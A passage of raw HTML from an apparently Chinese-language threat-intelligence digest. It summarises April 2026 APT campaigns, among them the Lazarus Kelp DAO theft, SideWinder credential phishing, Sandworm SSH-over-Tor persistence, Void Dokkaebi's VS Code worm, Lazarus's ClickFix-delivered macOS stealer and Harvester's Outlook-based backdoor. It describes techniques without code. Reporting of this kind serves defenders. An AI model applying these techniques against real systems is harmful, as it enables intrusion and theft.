src="https://wechat2rss.xlab.app/img-proxy/?k=a0feeb97&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq8icuJYEicribpwu1f13etegRibVtzrHEHmYLR62ODRBaCWrMh9TYds7v9L4uT2mmyI6DjSbZWHZ1Hktc5L4HSrElOIzOzbbhonrbY%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034864" src="https://wechat2rss.xlab.app/img-proxy/?k=0982eada&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqibYXic1xreT1lDjpGeu9nvCnFiaRbyFzR8k1ibGLaibvEH5Yk7zialP0fO4cN4Ax7Au9bhtKSWptDd6rN8srCHvJbg7xZd2agYNYTDw%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Lazarus 从 Kelp DAO 窃取了 2.9 亿美元</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月20日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://securityaffairs.com/191092/digital-id/north-koreas-lazarus-apt-stole-290m-from-kelp-dao.html" target="_blank">https://securityaffairs.com/191092/digital-id/north-koreas-lazarus-apt-stole-290m-from-kelp-dao.html</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者通过入侵LayerZero依赖的RPC节点并操纵验证层，对Kelp DAO发起攻击，利用其不安全的单点验证器配置绕过检查，盗取资金后Kelp DAO冻结合约并阻止了第二次约9500万美元的窃取尝试；LayerZero确认攻击仅影响rsETH配置，归因于Lazarus Group，并指出行业标准要求多验证器设置可避免此漏洞，但Kelp DAO未采纳，导致影响扩散至Aave等DeFi协议。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">SideWinder 使用伪造的 Chrome PDF 查看器和 Zimbra 克隆程序窃取政府网络邮箱凭证</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月20日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://intel.breakglass.tech/post/sidewinder-z2fa-lts-moincox-bangladesh-navy-pakistan-mofa-opsec-burn" target="_blank">https://intel.breakglass.tech/post/sidewinder-z2fa-lts-moincox-bangladesh-navy-pakistan-mofa-opsec-burn</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">SideWinder APT组织自2026年2月起针对南亚政府机构（包括孟加拉国海军、巴基斯坦外交部等）发起高度定向的钓鱼攻击，使用伪造的Chrome PDF查看器和像素级精确的Zimbra邮件登录克隆页面（内部项目名Z2FA_LTS）窃取凭证；攻击链始于伪造的巴基斯坦外交电报诱饵，通过模糊PDF、Zimbra加载页和反向代理真实资产实现，一次开发者的操作安全失误导致服务器返回堆栈跟踪，暴露了Linux用户名moincox及项目名，多个独立研究员确认该活动归属SideWinder。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">03</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">疑似APT-C-13（Sandworm）组织利用SSH+TOR隧道实现隐蔽持久化的攻击活动分析</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月21日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://mp.weixin.qq.com/s/nJpqvXCYV3ZdvNgYGrG4ow" target="_blank">https://mp.weixin.qq.com/s/nJpqvXCYV3ZdvNgYGrG4ow</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">近期360高级威胁研究院捕获APT-C-13（Sandworm）组织利用SSH与TOR嵌套隧道技术实施定向攻击的多个恶意样本。根据分析，APT-C-13组织通过鱼叉邮件投递携带恶意LNK文件的ZIP压缩包，诱骗用户执行后，LNK文件会在用户配置文件目录及其子文件夹中递归搜索诱饵压缩包并多层解压至指定位置，随后运行主控脚本创建SSH与TOR两个计划任务以构建复杂通信链路。其中TOR任务利用HiddenServicePort特性将受害机本地关键服务端口（如SMB/445、RDP/3389）映射至Onion匿名域名，使攻击者无需穿透入站防火墙即可通过Tor节点全球直连内网；同时SSH任务在Tor隧道内部署轻量化SSH服务端，通过PubkeyAuthentication公钥认证和自定义Subsystem子系统配置，形成兼具强加密性与权限控制的隐蔽远程管理通道，有效规避传统流量审计。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.43148148148148147" data-s="300,640" data-type="png" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034867" src="https://wechat2rss.xlab.app/img-proxy/?k=f1f50679&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOqicOc3Pjx5OdAC8msrHdDcuNBIqvE7lXpiaBGMemFw7MkkI0cibLiaGJ7Aga2LNpWjulhaqn2FCglhRTbY5IibmSc0bgSYzMrzub2HE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">04</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Void Dokkaebi 利用受感染的开发者代码库作为恶意软件传播渠道</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月21日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.trendmicro.com/en_us/research/26/d/void-dokkaebi-uses-fake-job-interview-lure-to-spread-malware-via-code-repositories.html" target="_blank">https://www.trendmicro.com/en_us/research/26/d/void-dokkaebi-uses-fake-job-interview-lure-to-spread-malware-via-code-repositories.html</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Void Dokkaebi（又名Famous Chollima）已从单目标社会工程学攻击演变为一种自我传播的供应链威胁，通过恶意VS Code任务和代码注入在开发者生态中实现蠕虫式传播。2026年3月的分析发现超过750个感染仓库、500多个恶意VS Code任务配置及101个提交篡改工具实例，该攻击利用Tron、Aptos和币安智能链等区块链基础设施托管载荷，即使开发者被入侵后，其代码贡献也会成为下游受害者的感染源。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="png" data-w="755" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034872" src="https://wechat2rss.xlab.app/img-proxy/?k=6d3a90de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOqic7VQNS1vPsxQzFAClwj1NfRQOTcs9QMOhcs31WoAWZqhTqC8vouLruRndl4HEyps2EgjPPD93pK6Tvz7oLziaibVdbBibUCdW9eE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">05</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Lazarus 使用“Mach-O Man”macOS 恶意软件工具包攻击企业</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月21日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/" target="_blank">https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Lazarus组织正在利用伪造的会议邀请链接，针对使用macOS系统的金融科技、加密货币等高价值环境发起ClickFix攻击，攻击者通过Telegram发送看似正常的会议邀请，诱导用户访问虚假的Zoom或Teams页面，并以“修复连接问题”为由诱骗用户手动在终端中复制执行恶意命令，从而部署名为“Mach-O Man”的新型恶意软件工具包；该工具包由多个Go语言编写的Mach-O二进制文件组成，依次执行系统指纹收集、持久化安装以及最终的信息窃取，窃取的数据包括浏览器凭证、Cookie和macOS钥匙串等敏感信息，并通过Telegram作为外传通道；整个攻击过程依赖于用户交互，能够绕过传统安全检测，给企业带来账户接管、财务损失和数据泄露等严重风险。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">06</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Harvester组织利用新的 GoGra Linux 后门扩展工具集</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月22日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.security.com/threat-intelligence/harvester-new-linux-backdoor-gogra" target="_blank">https://www.security.com/threat-intelligence/harvester-new-linux-backdoor-gogra</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Harvester APT组织开发了新型Linux版GoGra后门，该恶意软件利用Microsoft Graph API和Outlook邮箱作为隐蔽命令控制通道，通过伪装成PDF等诱饵文档的ELF文件传播，并设置系统自启动持久化；后门轮询特定邮箱文件夹中标题以“Input”开头的邮件，解密并执行命令后将结果以“Output”主题邮件回传，该Linux版本与Windows版本代码高度相似，目标主要针对印度和阿富汗地区。</span></p></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034870" src="https://wechat2rss.xlab.app/img-proxy/?k=2911caf1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqib0ibvI47S6Xljw7ax8bdtoaQibzD3eBTAkgRLNnD0DCZQrbr1wspwmiaYkLviblkviaC6oKXKSuia90EJ1bibSI6keiaibxvRfic8BnrJK4%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034868" src="https://wechat2rss.xlab.app/img-proxy/?k=97752f63&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq9AcagPicwg1dLWPkUg9LR3MOnDL6O1JJ7f5C9cPYpqt8stibT0GA9V3ia0kbW1W8icjsqgYpibwatiaI4MMOLLpdWE9eC7PF8mcnggk%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击行动或事件情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034869" src="https://wechat2rss.xlab.app/img-proxy/?k=2316c0c6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqib2yZTOrjHkbkfpC5cICE3Zic5XzjzjhYamUbjteZgltQSvwMibkhUenicCia06Lyy3icJQwvjxz0h97ourkAlekK8NricTQlDHEKAN0%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034871" src="https://wechat2rss.xlab.app/img-proxy/?k=00fd4f7d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqibHkEkBTicOtLKT5xmSCvZCvhAmj8EOOjZujge7GxZTZ1swMFLaa0EGPNibCQJvEDTcuiaNnqvml8axsFhicUsVVficeDTs42Xsmcvk%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击者会冒充 IT 或技术支持人员实施数据窃取</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月18日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a 